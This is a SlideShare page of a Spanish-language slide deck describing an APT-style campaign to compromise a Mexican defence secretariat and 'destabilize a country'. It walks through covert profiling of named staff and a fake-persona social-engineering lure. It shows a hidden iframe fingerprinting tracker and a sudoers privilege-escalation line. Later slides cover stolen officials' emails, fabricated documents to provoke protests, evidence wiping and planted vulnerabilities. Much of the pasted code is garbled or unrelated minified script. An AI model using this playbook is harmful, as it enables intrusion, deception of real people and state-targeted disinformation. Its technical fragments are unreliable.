SlideShare una empresa de Scribd logo

How to destabilize a country through cyber attacks

J
Jonathan Palacios

Este documento describe una metodología para desestabilizar un país mediante un ataque cibernético dirigido a objetivos críticos como el gobierno. La metodología involucra investigación extensa del objetivo, el desarrollo de una estrategia para acceder a sus sistemas a través de ingeniería social y la explotación de vulnerabilidades, y medidas para ocultar la identidad del atacante y evadir la detección. El documento proporciona detalles sobre cómo aplicar esta metodología para comprometer dispositivos de empleados

Software
1 de 40
Descargar para leer sin conexión
ADVANCED PERSISTENT THREAT - 1 HOW TO DESTABILIZE A COUNTRY
Presentacion Hola ! Mi nombre es jonathan inicie en la seguridad informatica a inicios del 2009 Los primeros anos me dedique a investigar malware , Durante el ano 2012 me dedique a investigar a hackers Estado Nacion , Metodologia y vulnerabilidades de dia 0 #zeroday y sus vectores de Ataque , en algunas ocasiones comparto seguridad para el kernel linux en WHONIX y temas de seguridad en Undercode . Mi principal actividad - Crear Vectores de Seguridad Linux Investigar Vulnerabilidades zeroday / Linux Crear Metodologias de Ataque Crear Modelos de Inteligencia Crear Sistemas OS Linux / Operaciones Ciberneticas Crear vulnerabilidades de dia 0 / Linux
SPECTRE METODOLOGIA Spectre > Es una metodologia privada de Ataque el cual maneja diferentes caracteristicas de operacion avanzada y rapidez . Esta metodologia permite ser utilizada para evaluar la seguridad de un objetivo critico . Por ejemplo > Militar / Aereo – Espacial / Infraestructura Critica / Presidencia de un Pais ,,, Estructura / Spectre - Investigacion - Estrategia - Analisis - Rapidez - Sigilo - Anonimato - Camouflage - Clonacion - Explotacion * Fragmentacion - Punto de retorno - Acciones Objetivo - Limpieza
CONTRA CIBER INTELIGENCIA CCI Permite evaluar las tecnicas utilizadas por laboratorios de seguridad a su vez permite observar y aprender de la seguridad utilizada por equipos / red team / blue team / purple team . CCI permite ver un panorama amplio y diferente , a su vez permite identificar puntos vulnerables durante el analisis e investigacion , Nunca utiliza el mismo parametro de Ciber - inteligencia CCI se divide en 2 caracteristicas principales . Contra Ciber Inteligencia / Defensa Contra Ciber Inteligencia / Ataque
Introduccion La diapositiva tratara de explicar de manera practica un ataque dirigido a un objetivo que permita desestabilizar un pais Para este desarrollo se utilizara la metodogia spectre , de investigacion y analisis se utilizaran tecnicas de Contra Ciber Inteligencia , En mexico se muestra un panorama diferente el cual empresas nacionales O internacionales e instituciones son afectadas, o son objetivo de Unidades Cyberwarfare y Unidades APT . El Ataque del objetivo es simulado y didactico # Un atacante tiene el mismo conocimiento de los especialistas en ciberseguridad mostrando un ataque mas exacto y complejo a fin evitar todas las posibilidades de una respuesta .
Investigacion > Este proceso es el mas importante ya que permitira recolectar toda la informacion necesaria , para evitar ser detectado nunca se utilizaran herramientas OSINT u otra , esto evitara ser identificado y detectado . Una vez identificado se evalua el objetivo y alcance que tendria al atacar el objetivo Que tan eficaz seria , que tiempo de respuesta tiene durante una emergencia , evaluar el conocimiento de su personal TIC – Ciberseguridad a fin de conocer sus estrategias Objetivo > SEDEMA / SECRETARIA DE LA DEFENZA XXX Alcanze > Nacional / Pais Completo Tiempo de Respuesta > 5 Dias Conocimiento > Tecnicas de Ciberdefensa Ciberseguridad > Centro Operaciones del Ciberespacio Estrategia > Comparte informacion con otras intituciones , su principal soporte CERT-MXO
La busqueda manualmente nos permite observar su estructura interna Por ejemplo insignias , sistemas operativos y cosas importantes que nos permite evaluar
La evaluacion nos permite observar un sistema operativo , windows 10 , y hardware inalambrico , Teclado y Mouse A su vez podemos observar que el area de Protección Civil utiliza internet – Local – Externo para recibir informacion Las insignias nos permiten identificar al personal del area de operaciones del ciber espacio y estudiar su comportamiento en linea
La investigacion nos permite observar a diferentes personas que trabajan en la secretaria de defenza SEDEMA , instalaciones e imagenes de sus intereses , amigos , gustos , etc Las insignias nos permitio la ubicacion de una persona comunicologa e influenzer de SEDEMA el cual le permiten grabar e informar sobre las actividades de la institucion # Identificando al Objetivo Entre sus contactos podemos observar personal militar de diferentes rangos Llamandose Antiguedad #
Estrategia Infectar el dispositivo de la chica influenzer el cual podremos llegar a objetivos de mayor Grado / Estado Mayor Militar La influenzer tiene una hermana con mucha actividad en redes sociales A su vez ella tiene un novio con actividad en redes sociales y muchas amigas que no estan en comun . Paso 1 Crear Un perfil falso de una chica atractiva , con gustos similares a los del chico , Paso 2 Ubicacion cdmx , Estudiante de universidad uvm subir fotos normal No provocativas ni nada Paso 3 Una vez teniendo 10,000 seguridores o un poco mas se enviara Solicitud de amistad al chico > El chico aceptara la solicitud . Paso 4 Conversacion , El chico mostrara interes de la chica el cual en algun momento mencionara si pueden ser amigos y conocerse, ella se negara pero utilizara la estrategia del huracan Conversacion > EL > hola como estas Ella > hola bien , pero preocupada por los perritos de cancun , quisiera ayudarlos El > Si , yo te podria ayudar pero que podemos hacer Ella > si compramos alimento y lo enviamos , mira no tienen nada que comer LINK > Imagen > Recolector
El chico al dar click seran capturados sus datos Por recolector . Sistema operativo Version Arquitectura IP Address JavaScript WebRTC Leak Test Canvas Fingerprint WebGL Report Font Fingerprinting Geolocation API Features Detection SSL/TLS Client Test Content Filters Esta herramienta Puede ser modificada como un Exploit Pack evitando la carga de CVE unicamente utilizado para recolectar informacion
Encode html : <iframe src="hola.html" style="width: 0%; height: 0px; border: 0"></iframe>
Ejemplo Panel Recolector Panel recolector guardara toda la informacion del objetivo , a travez de iframes no sera detectada por ningun AV o identificador de malware , Abuse-ch , virustotal , Anubis etc ..
Las unidades APT siempre utilizan en sus tecnicas 0 / 45 detencion / Ejemplo de Pagina no encontrada de recolector ,
Analisis Analisis permite revisar la informacion exacta del objetivo , una vez obtenido se identifica que vulnerabilidad se utilizara , 07-13 21:50:59.000 3351 3351 I /system/bin/tombstoned: received crash request for pid 24089 07-13 21:50:59.006 24089 24089 F DEBUG : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** 07-13 21:50:59.006 24089 24089 F DEBUG : Build fingerprint: 'samsung/hero2ltexx/hero2lte:8.0.0/R16NW/G935FXXS4ESC3:us er/release-keys' 07-13 21:50:59.006 24089 24089 F DEBUG : Revision: '9' 07-13 21:50:59.006 24089 24089 F DEBUG : ABI: 'arm64' 07-13 21:50:59.006 24089 24089 F DEBUG : pid: 24089, tid: 24089, name: media.extractor >>> mediaextractor <<< 07-13 21:50:59.006 24089 24089 F DEBUG : signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x7ccb800050 07-13 21:50:59.009 24089 24089 F DEBUG : x0 00000000ffffff36 x1 0000000000000000 x2 00000000000000f0 x3 0000000000000001 07-13 21:50:59.009 24089 24089 F DEBUG : x4 0000000000000001 x5 0000007ccb5df1b8 x6 0000007cc927363e x7 0000007cc8e7bd04 07-13 21:50:59.009 24089 24089 F DEBUG : x8 0000000000004170 x9 0000000000004160 x10 00000000ffffffff x11 0000007ccb7fbef0 07-13 21:50:59.010 24089 24089 F DEBUG : x12 0000007ccb5d3ce0 x13 000000000000001e x14 0000000000000003 x15 0000000000000001 07-13 21:50:59.010 24089 24089 F DEBUG : x16 0000007cc99f5f50 x17 0000007ccb88885c x18 0000007ccb566225 x19 0000007ccb562020 07-13 21:50:59.010 24089 CVE – RCE Android
Download se activara cuando identifique parametros especificos del objetivo La chica mencionara a mi si me carga la imagen de los perritos , El objetivo nuevamente ingresara y la imagen podra ser observada y sera descargada Sin error no encontrado.
Download e iframe detectara parametros exactos del objetivo IP : 170.244.77.221 Country: Mexico State: Ciudad de Mexico City: Azcapotzalco Latitude: 19.4888 Longitude: -99.1836 ISP: IZZI Cable S.A. de C.V. Browser Name: Firefox Browser Type: Browser Browser Version: 102 Browser Engine: Gecko 102 JavaScript: Enabled Cookies: Enabled Screen Resolution: 1600x900 Browser Window Size: 1600x735 Name: Android Version: 9.1 series xx Platform: xxx var e=this||self; var f={};function w(a,c){if(null===c)return!1;if("contains"in a&&1==c.nodeType)return a.contains(c);if("compareDocumentPosition"in a)return a==c||!! (a.compareDocumentPosition(c)&16);for(;c&&a! =c;)c=c.parentNode;return c==a}; var y=function(a,c){return function(d){d||(d=window.event);return c.call(a,d)}},z="undefined"!=typeof navigator&&/Macintosh/.test(navigator.userAgent),E=function() {this._mouseEventsPrevented=!0};var F=function(a) {this.g=a;this.h=[]},G=function(a){for(var c=0;c<a.h.length;++c){var d=a.g,b=a.h[c];d.removeEventListener? d.removeEventListener(b.eventType,b.s,b.capture):d.detachEvent&&d .detachEvent("on"+b.eventType,b.s)}a.h=[]};var H=e._jsa|| {};H._cfc=void 0;H._aeh=void 0; var I=function(){this.h=this.g=null},K=function(a,c){var d=J;d.g=a;d.h=c;return d};I.prototype.i=function(){var a=this.g;this.g&&this.g!=this.h?this.g=this.g.__owner|| this.g.parentNode:this.g=null;return a};var L=function(){var a;this.j=a=void 0===a?[]:a;this.g=0;this.h=null;this.l=! 1},N=function(a,c){var d=M;d.j=a;d.g=0;d.h=c;d.l=!1;return d};L.prototype.i=function(){if(this.l)return J.i();if(this.g!=this.j.length){var a=this.j[this.g];this.g++;a!=this.h&&a&&a.__owner&&(this.l=! 0,K(a.__owner,this.h));return a}return null};var J=new I,M=new L; var Q=function() {this.v=[];this.g=[];this.h=[];this.l={};this.i=null;this.j=[];P(this,"_custom") },R=function(a){return String.prototype.trim?a.trim():a.replace(/^ s+/,"").replace( Parametros objetivo
El objetivo no se percatara de links o coversaciones enviadas . La persona infectada al tratar de utilizar instagram tendra un error , en segundos todo estara normalmente
Camouflage Esta caracteristica permite pasar desapercibido a su vez permite observar y aprender caracteristicas , motivaciones e informacion importante El atacante tiene como finalidad aprender y socialiazar como un militar ya que se necesitara informacion u compartamiento militar para llegar al objetivo principal .
SIGILO Sigilo es un mecanismo de defensa el cual pasara inadvertido por los laboratorios de seguridad ya que se ocultara utilizando codigo de Google Se utilizaran los parametros que mencionan las compañias AV para evadir su proteccion No Descargar Archivos Ejecutables No Ingresar en paginas sin certificado SSL No Compartas informacion No Abrir correos Electronicos ... Esta caracteristica permite que el objetivo venga al atacante y no biceversa , ya que en ningun momento pedira informacion o actuara mal intensionado
Pagina comprometida con iframe el cual sera visitada por el objetivo / Miltar de Proteccion Civil https://googleads.g.doubleclick.net/aclk?sa=l&ai=C6c1ZFq9XZbHBE- SW_tMPq4Oy2AL0gsyYdJagiufqEdnbjuOSDhABIOr60Uxg5eP2hJgWoAHy4siIA8gBAqgDAcgDyQSqBP4BT9A5t6PaDXJyiLbajvOasnXm4q9qcyPlbs2JhGe00w1mrJD4xcPeLTylua1capb 3rM0kyvf7iT7H6oBvz9A3R5xfa_JjyXvwU4VIq0T1xIhyMCZG-oFG6yqEk2rA62W3bwx0owrcL28Racd0xoux8tWk-Ap-XzbNOBPQKJs8jSTTy6Znu0YSx6Ba- pdJw2CoBqBrHoNhcFqK35lqJjCyBMWh-uJn32SA5G9OOKVsCo-H6DZYfhDc7SlKsFuZwP1Rc0ztLZiHdKKRHWu7zVx7YJOYnMfUbqbObJfNfalZ- Zkghf5R4fs_IdehcS92FwtgX0Yuf2bTqOVboF1uXDDABIChzN7QBIgF7IKWx0ygBgKAB5fEmvIEqAfZtrECqAeOzhuoB5PYG6gH7paxAqgH_p6xAqgH1ckbqAemvhuoB5oGqAfz0RuoB5b YG6gHqpuxAqgHg62xAqgH_56xAqgH35- xAtgHAdIIFAiAYRABGB8yAooCOgKAQEi9_cE6sQlg7LvHOMklVoAKAYoK7wFodHRwczovL3BpeGVsLmV2ZXJlc3R0ZWNoLm5ldC83OTAvY3E_ZXZfc2lkPTMmZXZfbG49JmV2X2x4PS Zldl9jcng9NjczNzIwNzk4OTY4JmV2X210PSZldl9uPWQmZXZfbHR4PSZldl9wbD1zdXJhY2FwdWxjby5teCZldl9wb3M9JmV2X2R2Yz1jJmV2X2R2bT0mZXZfcGh5PTEwMTAwOTEmZXZ fbG9jPSZldl9jeD0yMDU1MDM1MzI2MCZldl9heD0xNTkxMTIxNzE2NDgmZXZfZWZpZD17Z2NsaWR9Okc6cyZ1cmw9e2xwdXJsfZgLAcgLAeALAaIMFCoSChDktLEC7rWxArW4sQK7u7 ECqg0CTVjIDQHYEw3QFQH4FgGAFwE&ae=1&gclid=EAIaIQobChMIsaT5mtPLggMVZIt_BB2rgQwrEAEYASAAEgLcKfD_BwE&num=1&cid=CAQSTwDICaaNr0-80mYhy3_k- K3X0YajdQrWmBw9Uk73FAfPL5FK7Pu5rjN609rgMpKFJm_PQLOFfYs87VlF2p-cD6B8nFnXjbi5yjvrQ7gILosYAQ&sig=AOD64_3zU9kKPPqAc_txFm8fbDlpoYxjfQ&client=ca-pub- 5434027793127906&rf=2&nb=17&adurl=https://IFRAME.HTML_id%3DEAIaIQobChMIsaT5mtPLggMVZIt_BB2rgQwrEAEYASAAEgLcKfD_BwE:G:s%26s_kwcid%3DAL!790!3! 673720798968!!suracapulco.mx!d!!!20550353260!159112171648%26cmp%3DKAC-INI-GOOGUS-GO-MX_GL-EN-RE-DS-REBUY-CREATE-MB_ALWAYS_ON-SHOP-XX-BN-WV- CIDNA00000-MB_INSIDERS%26gclid%3DEAIaIQobChMIsaT5mtPLggMVZIt_BB2rgQwrEAEYASAAEgLcKfD_BwE
Una vez el militar de click sera comprometido su dispositivo , en Esta segunda Fase nos ubicamos dentro de personal que trabaja dentro del campo militar XX El atacante eliminara procesos anteriores a fin de utlizar el anonimato para no ser identificado
Objetivo SargentoMuyBravo Conoce las actividades que realiza el Ejército y Fuerza Aérea Mexicanos en beneficio del pueblo Página · Medio de comunicación/noticias Av. Industria Militar S/N, Esq. Blvd. Manuel Ávila Camacho, Mexico City, 55 2132 9900 sargentomuybravo.dn29@sedema.gob.mx gob.mx/sedema Siempre abierto Calificación · 5,0 (5 opiniones)
Los Acortadores se utilizaran para insertar el iframe no siendo detectado por ningun AV https://bit.ly/23144xxxxx al igual que el objetivo anterior primero se identificara informacion del dispositivo Una vez identificado los parametros exactos el objetivo podra visualizar correctamente la pagina . Notando su COMIC # SEDEMA COMIC 6 / <script type="50dd510e60eab9be36cad392- text/javascript"> !function(t,n,i,s){var e=function(s,e) {this.elem=s,this. $elem=t(s),this.options=e,this.metada ta=this.$elem.data("plugin- options"),this. $win=t(n),this.sections={},unction iPadLogic(){!0===(/iPad|iPhone| iPod/.test(navigator.platform)||"MacInt el"===navigator.platform&&1<navigat or.maxTouchPoints)&&(window.regSe ttings.steps=2,window
El atacante utilizara el anonimato para evitar la identificacion de sus herramientas u operaciones ciberneticas , Utilizando recursos disponibles de internet de esta manera evita la identificacion de google , dorks , trace u otro compartamiento que necesite ser revisado Como funciona ! Cuando un atacante crea un panel de administracion nuevo , para los motores de busqueda o IA es mas sencillo identificar ya que no existe otro igual , codigo , head , meta , estructura , comportamiento etc La utilizacion de paneles de administracion evade la inteligencia de Google e IA y que es similar a millones de administradores que se encuentran en linea ..
Ejemplo Panel de Administracion , El panel unicamente recolectara informacion especifica del hardware , software , del objetivo al igual que informacion importante como , Emails , doc, xls , etc Informacion Especifica Del objetivo Hardware ID CPU Informacion GPU Informacion Hardware , Teclado , Mouse , Dispositivos Externos Software > Programas Instalados , Programas de seguridad etc ..
Informacion Sargento muyBravo Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.2151.72 Hardware ID > DHAJDHUI88932487GHJKSDJI74794808 Antivirus > Avest Free Sandbox > No found Maquina Virtual > No found IDS / IPS > No found Firewall > No found EDR / XDR > No found Memory Protection > No found CPU Protection > No found I/O Protection > No found Software Windows Office V . 2019 xx xx Licence x Winrar / ccleaner / Vlc / etc ..
Identificacion del Estado Mayor Correos Electronicos extraidos Del correo electronico comprometido identificando a generales del Estado Mayor El cual conducira al Objetivo Principal Gral Brig D.E.M Pedro Pablo Sanchez / Telefono xxx /Extension 85xxx / Correo ss.xxxxx.xxsx@sedema.gob.mx Jefe de la xx / E.M.D.N revista.dn29@sedema.gob.mx Xxxxx@sedema.gob.mx Panel de administraccion Email , permitiendo el abceso sin restriciones de Sedema
El atacante utilizara documentos originales el cual no podran distinguirse utilizando la seguridad exactamente igual - Correo Cetificado - Correo Verificado Esto le permite al atacante pasar desapercibido de esta manera el atacante utiliza camouflage utilizando su misma estructura Ejemplo Email original / Infectado
Clonacion Este parametro permite al atacante clonar toda la estructura a la cual sera insertada la vulnerabilidad o vector zeroday o exploit 0day . Esto le permite saber con exactitud donde hay un error o hasta que punto la seguridad es eficaz En este punto el atacante se encuentra dentro de las computadoras del Estado Mayor El atacante identifico vulnerabilidades en Antivirus ESIT nod42 y Suricata IDS / Permitiendo envio de informacion maximo 1.MB , puerto 443 UDP / Puerto 80 TCP / .html .ico . css El atacante unicamente afectara dispositivos atravez de Hardware ID tcp 0 0 192.168.1.8:80 192.178.52.234:443 TIME_WAIT - tcp 0 0 192.168.1.8:80 173.194.143.6:443 ESTABLISHED tcp 0 0 192.168.1.8:80 173.194.143.6:443 ESTABLISHED tcp 0 0 192.168.1.8:80 189.195.42.140:443 ESTABLISHED
Fragmentacion Este parametro permite evaluar , identificar y detectar posible evasion , perimetro o anticipacion a su vez permite observar el vector exacto para infectar al objetivo
Vector zeroday Esta caracteristica analiza la ejecucion y proceso que tendra la vulnerabilidad – exploit zeroday , a su vez tiene auto eliminacion y proteccion Analizador Identificador ID Carga útil . Escaner de estructura interna Auto-eliminación Exploit 0 day
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.1.2 netmask 255.255.255.0 broadcast 192.168.1.255 ether c6:ce:13:92:02:2c txqueuelen 1000 (Ethernet) @461890585618002:~$ swapon -s Filename Type Size Used Priority /dev/sda5 partition 998396 0 -2 # Certificates for signature checking CONFIG_MODULE_SIG_KEY is not set # CONFIG_MODULE_SIG_KEY_TYPE_RSA is not set CONFIG_MODULE_SIG_KEY_TYPE_ECDSA is not set CONFIG_SYSTEM_TRUSTED_KEYRING is not set CONFIG_SYSTEM_TRUSTED_KEYS is not set CONFIG_SYSTEM_EXTRA_CERTIFICATE is not set CONFIG_SYSTEM_EXTRA_CERTIFICATE_SIZE is not set CONFIG_SECONDARY_TRUSTED_KEYRING is not set CONFIG_SYSTEM_BLACKLIST_KEYRING is not set CONFIG_SYSTEM_BLACKLIST_HASH_LIST is not set CONFIG_SYSTEM_REVOCATION_LIST is not set CONFIG_SYSTEM_REVOCATION_KEYS is not set # end of Certificates for signature Exploit echo "> Opening sudoers file," echo "$( whoami ) ALL=(ALL:ALL) ALL" read -n 1 -s -p -a" EDITOR="soffice -- /etc/sudoers" $exploit 00x/00x/00x/ sudo su root Exit 0 mv /sys/firmware/i915/* ………..xx Hardware ID / etc/machine-id : 10447166441267740514483863 0014 /proc/cpuinfo - processor : xxxxx vendor_id : xxxxx cpu family : xxxxx model : xxxxx model name : xxxxx stepping : xxxxx microcode : xxxxx
Centro del Ciberespacio Punto de retorno Este parametro permite atacar diferentes objetivos al mismo tiempo Durante el analisis el intercambio de informacion entre instituciones nos permite saber de forma especifica sus herramientas
Acciones Objetivo En Este punto el secretario de SEDEMA fue comprometido su dispositivo , En este punto el atacante puede filtrar informacion , U otro pero APT – 1 Tiene una funcion especifica Desestabilizar un Pais completo , El atacante creara documentos con informacion que no existe el cual seran compartidos desde sus dispositivos .. - Iniciaran Manifestaciones en la ciudad - Se perjudicara la economia en los estados - Colectivos sociales , etc iniciaran manifestaciones en los estados - La democracia se vera afectada - etc ...
Limpieza Este parametro permite evadir cualquier tipo de recoleccion de evidencia o intento de identificar su operacion cibernetica . Las unidades APT o APT -1 Utilizan a hackers o grupos de hackers el cual limpiaran su actividad Acciones - Delete / Wipe / Eliminar Persistencia de ubicaciones / audio / Grafica / Teclado inalambrico etc Wipe Memori Kernel Abrir Puertos / Permitir Conexiones Inlimitadas 20/tcp open unknown 21/tcp open ftp 22/tcp open ssht 80/tcp open unknown 112/tcp open unknown 32659/tcp open unknown Insertar vulnerabilidades en aplicaciones Estos parametros evitan la identificacion del Atacante , una vez identificado los puertos abiertos , hackers con diferentes propositos podran explotar la vulnerabilidad eliminando por completo el rastro de la unidad APT Ejemplo . Aplicacion vulnerable modificada a una version actual
Como Puedo Protegerme ! Como se puede observar las Unidades APT o Unidades Cyberwarfare tienen capacidades diferentes el cual una seguridad estandar puede ser evadida La randomizacion completa permite evadir el reconocimiento Usuario , gpu, cpu informacion , hardware , Teclado inalambrico / Mouse , red entre otros Ejemplo al iniciar la seguridad Nucleo 1 tiempo uname -a 11111111111111111111111111111 461890585618002 1111.1111.1111 x86_64 GNU/Linux Nucleo tiempo 2 uname -a 2222222222222222222222222 647909467589290 1111.1111.1111 x86_64 GNU/Linux Nucleo Tiempo 3 3333333333333333333333333 346578294759602 1111.1111.1111 x86_64 GNU/Linux
MUCHAS GRACIAS

Recomendados

Certificación "THD-EPC Ethical Pentester Panamá"
Certificación "THD-EPC Ethical Pentester Panamá"Certificación "THD-EPC Ethical Pentester Panamá"
Certificación "THD-EPC Ethical Pentester Panamá"CIDITIC - UTP
 
Certificación "Thd epc ethical pentester"
Certificación "Thd epc ethical pentester" Certificación "Thd epc ethical pentester"
Certificación "Thd epc ethical pentester" CIDITIC - UTP
 
Security de Hacking-etico-.pdf
Security de Hacking-etico-.pdfSecurity de Hacking-etico-.pdf
Security de Hacking-etico-.pdfLuisMuoz394308
 
Secuestro de sesiones
Secuestro de sesionesSecuestro de sesiones
Secuestro de sesionesTensor
 
Secuestro de sesiones
Secuestro de sesionesSecuestro de sesiones
Secuestro de sesionesTensor
 
Secuestro de sesiones Vía DroidSheep
Secuestro de sesiones Vía DroidSheepSecuestro de sesiones Vía DroidSheep
Secuestro de sesiones Vía DroidSheepTensor
 
REVISTA- Riesgo y Seguridad de las Computadoras
REVISTA- Riesgo y Seguridad de las ComputadorasREVISTA- Riesgo y Seguridad de las Computadoras
REVISTA- Riesgo y Seguridad de las ComputadorasSophiaLopez30
 
Metasploit Class: Shellshock Attack
Metasploit Class: Shellshock AttackMetasploit Class: Shellshock Attack
Metasploit Class: Shellshock AttackJulian Gonzalez
 

Recomendados

Certificación "THD-EPC Ethical Pentester Panamá"
Certificación "THD-EPC Ethical Pentester Panamá"Certificación "THD-EPC Ethical Pentester Panamá"
Certificación "THD-EPC Ethical Pentester Panamá"CIDITIC - UTP
 
Certificación "Thd epc ethical pentester"
Certificación "Thd epc ethical pentester" Certificación "Thd epc ethical pentester"
Certificación "Thd epc ethical pentester" CIDITIC - UTP
 
Security de Hacking-etico-.pdf
Security de Hacking-etico-.pdfSecurity de Hacking-etico-.pdf
Security de Hacking-etico-.pdfLuisMuoz394308
 
Secuestro de sesiones
Secuestro de sesionesSecuestro de sesiones
Secuestro de sesionesTensor
 
Secuestro de sesiones
Secuestro de sesionesSecuestro de sesiones
Secuestro de sesionesTensor
 
Secuestro de sesiones Vía DroidSheep
Secuestro de sesiones Vía DroidSheepSecuestro de sesiones Vía DroidSheep
Secuestro de sesiones Vía DroidSheepTensor
 
REVISTA- Riesgo y Seguridad de las Computadoras
REVISTA- Riesgo y Seguridad de las ComputadorasREVISTA- Riesgo y Seguridad de las Computadoras
REVISTA- Riesgo y Seguridad de las ComputadorasSophiaLopez30
 
Metasploit Class: Shellshock Attack
Metasploit Class: Shellshock AttackMetasploit Class: Shellshock Attack
Metasploit Class: Shellshock AttackJulian Gonzalez
 
Hackers
HackersHackers
HackersDeBoRaNbA8
 
hackinbo.pdf
hackinbo.pdfhackinbo.pdf
hackinbo.pdfHacking Bolivia
 
Delicuentes informaticos
Delicuentes informaticosDelicuentes informaticos
Delicuentes informaticosdanitamab
 
Delicuentes informaticos
Delicuentes informaticosDelicuentes informaticos
Delicuentes informaticosdanitamab
 
Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...
Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...
Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...Cristián Rojas, MSc., CSSLP
 
Iniciación al Ethical Hacking
Iniciación al Ethical HackingIniciación al Ethical Hacking
Iniciación al Ethical HackingChris Fernandez CEHv7, eCPPT, Linux Engineer
 
Delincuentes informaticos (2)
Delincuentes informaticos (2)Delincuentes informaticos (2)
Delincuentes informaticos (2)clarar102
 
HoneyNet
HoneyNetHoneyNet
HoneyNetKaren Santos Reyes
 
Origen de los_problemas_de_seguridad_informatica_nuevo
Origen de los_problemas_de_seguridad_informatica_nuevoOrigen de los_problemas_de_seguridad_informatica_nuevo
Origen de los_problemas_de_seguridad_informatica_nuevoKatherine Reinoso
 
TRABAJO EN CLASE CARLOS MONTERO
TRABAJO EN CLASE CARLOS MONTEROTRABAJO EN CLASE CARLOS MONTERO
TRABAJO EN CLASE CARLOS MONTEROcarlos fernando montero cadena
 
Los atacantes y profesionales de la ciberseguridad
Los atacantes y profesionales de la ciberseguridadLos atacantes y profesionales de la ciberseguridad
Los atacantes y profesionales de la ciberseguridadJesusalbertocalderon1
 
Origen de los_problemas_de_seguridad_informatica_nuevo[1]
Origen de los_problemas_de_seguridad_informatica_nuevo[1]Origen de los_problemas_de_seguridad_informatica_nuevo[1]
Origen de los_problemas_de_seguridad_informatica_nuevo[1]yuliaranda
 
Origen de los_problemas_de_seguridad_informatica_nuevo[1]
Origen de los_problemas_de_seguridad_informatica_nuevo[1]Origen de los_problemas_de_seguridad_informatica_nuevo[1]
Origen de los_problemas_de_seguridad_informatica_nuevo[1]yuliaranda
 
Origen de los_problemas_de_seguridad_informatica_nuevo[1]
Origen de los_problemas_de_seguridad_informatica_nuevo[1]Origen de los_problemas_de_seguridad_informatica_nuevo[1]
Origen de los_problemas_de_seguridad_informatica_nuevo[1]yuliaranda
 
Origen de los_problemas_de_seguridad_informatica_nuevo[1]
Origen de los_problemas_de_seguridad_informatica_nuevo[1]Origen de los_problemas_de_seguridad_informatica_nuevo[1]
Origen de los_problemas_de_seguridad_informatica_nuevo[1]yuliaranda
 
Hackon URJC
Hackon URJCHackon URJC
Hackon URJCLucas Fernández Aragón
 
Webinar Gratuito "Ingeniería Social"
Webinar Gratuito "Ingeniería Social"Webinar Gratuito "Ingeniería Social"
Webinar Gratuito "Ingeniería Social"Alonso Caballero
 
Fase6_100414_66_Colaborativo
Fase6_100414_66_ColaborativoFase6_100414_66_Colaborativo
Fase6_100414_66_ColaborativoWilliamBeltran007
 
PPT_Carlos Nieto_v03_06_2021.pptx
PPT_Carlos Nieto_v03_06_2021.pptxPPT_Carlos Nieto_v03_06_2021.pptx
PPT_Carlos Nieto_v03_06_2021.pptxFernandoGonzalez668747
 
Penetration Testing / Ethical Hacking
Penetration Testing / Ethical HackingPenetration Testing / Ethical Hacking
Penetration Testing / Ethical HackingAlonso Caballero
 

Más contenido relacionado

Similar a How to destabilize a country through cyber attacks

Delicuentes informaticos
Delicuentes informaticosDelicuentes informaticos
Delicuentes informaticosdanitamab
 
Delicuentes informaticos
Delicuentes informaticosDelicuentes informaticos
Delicuentes informaticosdanitamab
 
Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...
Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...
Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...Cristián Rojas, MSc., CSSLP
 
Delincuentes informaticos (2)
Delincuentes informaticos (2)Delincuentes informaticos (2)
Delincuentes informaticos (2)clarar102
 
Origen de los_problemas_de_seguridad_informatica_nuevo
Origen de los_problemas_de_seguridad_informatica_nuevoOrigen de los_problemas_de_seguridad_informatica_nuevo
Origen de los_problemas_de_seguridad_informatica_nuevoKatherine Reinoso
 
Los atacantes y profesionales de la ciberseguridad
Los atacantes y profesionales de la ciberseguridadLos atacantes y profesionales de la ciberseguridad
Los atacantes y profesionales de la ciberseguridadJesusalbertocalderon1
 
Origen de los_problemas_de_seguridad_informatica_nuevo[1]
Origen de los_problemas_de_seguridad_informatica_nuevo[1]Origen de los_problemas_de_seguridad_informatica_nuevo[1]
Origen de los_problemas_de_seguridad_informatica_nuevo[1]yuliaranda
 
Origen de los_problemas_de_seguridad_informatica_nuevo[1]
Origen de los_problemas_de_seguridad_informatica_nuevo[1]Origen de los_problemas_de_seguridad_informatica_nuevo[1]
Origen de los_problemas_de_seguridad_informatica_nuevo[1]yuliaranda
 
Origen de los_problemas_de_seguridad_informatica_nuevo[1]
Origen de los_problemas_de_seguridad_informatica_nuevo[1]Origen de los_problemas_de_seguridad_informatica_nuevo[1]
Origen de los_problemas_de_seguridad_informatica_nuevo[1]yuliaranda
 
Origen de los_problemas_de_seguridad_informatica_nuevo[1]
Origen de los_problemas_de_seguridad_informatica_nuevo[1]Origen de los_problemas_de_seguridad_informatica_nuevo[1]
Origen de los_problemas_de_seguridad_informatica_nuevo[1]yuliaranda
 
Webinar Gratuito "Ingeniería Social"
Webinar Gratuito "Ingeniería Social"Webinar Gratuito "Ingeniería Social"
Webinar Gratuito "Ingeniería Social"Alonso Caballero
 
Fase6_100414_66_Colaborativo
Fase6_100414_66_ColaborativoFase6_100414_66_Colaborativo
Fase6_100414_66_ColaborativoWilliamBeltran007
 
Penetration Testing / Ethical Hacking
Penetration Testing / Ethical HackingPenetration Testing / Ethical Hacking
Penetration Testing / Ethical HackingAlonso Caballero
 

Similar a How to destabilize a country through cyber attacks (20)

Hackers
HackersHackers
Hackers
 
hackinbo.pdf
hackinbo.pdfhackinbo.pdf
hackinbo.pdf
 
Delicuentes informaticos
Delicuentes informaticosDelicuentes informaticos
Delicuentes informaticos
 
Delicuentes informaticos
Delicuentes informaticosDelicuentes informaticos
Delicuentes informaticos
 
Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...
